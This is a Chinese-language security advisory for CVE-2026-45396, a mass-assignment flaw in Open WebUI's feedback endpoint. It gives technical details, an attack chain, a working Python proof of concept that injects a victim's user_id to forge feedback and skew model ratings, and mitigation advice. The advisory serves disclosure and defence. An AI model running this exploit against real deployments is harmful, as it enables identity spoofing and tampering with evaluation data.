CVE-2026-45396 CVSS 5.4 中危

CVE-2026-45396 Open WebUI 批量赋值致身份欺骗

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45396

漏洞类型

批量赋值

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI 在 0.9.5 版本之前存在批量赋值安全漏洞。攻击者利用 FeedbackForm 的配置缺陷，在 /api/v1/evaluations/feedback 接口请求中注入 user_id 参数覆盖服务器端生成的值。该漏洞允许低权限用户伪造身份提交反馈，从而篡改模型评估排行榜数据，破坏系统完整性。

技术细节

该漏洞的核心在于 Open WebUI 后端处理反馈提交时的不安全对象绑定。FeedbackForm 使用了 `ConfigDict(extra='allow')` 配置，这意味着 Pydantic 模型会接受并保留请求体中未显式定义的字段。在 `insert_new_feedback()` 函数内部，代码将用户提交的数据与服务器生成的上下文数据进行字典合并。由于合并顺序或逻辑存在缺陷（客户端数据覆盖了服务端数据），攻击者可以在已认证会话中向 `/api/v1/evaluations/feedback` 端点发送 POST 请求，并在 JSON 负载中显式包含 `user_id` 字段。服务器端接收后，会使用攻击者提供的 user_id 而非当前登录用户的真实 ID 来创建数据库记录。这种利用方式无需高权限，仅需普通用户身份即可实施，严重破坏了 Elo 评分系统的公正性和用户身份的可信度。

攻击链分析

STEP 1

1. 信息收集

攻击者确认目标运行 Open WebUI 版本低于 0.9.5，并发现 /api/v1/evaluations/feedback 接口。

STEP 2

2. 获取凭证

攻击者注册或登录一个普通低权限账户，获取有效的会话 Token。

STEP 3

3. 漏洞利用

攻击者构造 POST 请求，在 JSON 请求体中注入目标用户的 user_id 字段，发送至反馈接口。

STEP 4

4. 达成效果

服务器将反馈记录关联到被伪造的用户 ID，导致 Elo 评分被篡改，实现身份欺骗。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip:3000/api/v1/evaluations/feedback"

# Attacker's session cookie (low privilege user)
cookies = {
    "auth_token": "attacker_valid_token_here"
}

# Malicious payload injecting user_id to impersonate victim
payload = {
    "content": "This is a malicious feedback to manipulate ratings",
    "rating": 1,
    "user_id": "target_victim_user_id", # Key exploitation: overwrite server-derived ID
    "model_id": "some_model_id"
}

# Send the request
response = requests.post(url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("PoC successful: Feedback submitted as target user.")
else:
    print(f"PoC failed: {response.status_code}, {response.text}")

影响范围

Open WebUI < 0.9.5

防御指南

临时缓解措施

建议立即升级至 0.9.5 版本。如无法立即升级，应在 API 网关或 WAF 层面设置规则，拦截对 /api/v1/evaluations/feedback 接口请求中包含 user_id 字段的流量，或临时禁用该反馈功能以防止评分被污染。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表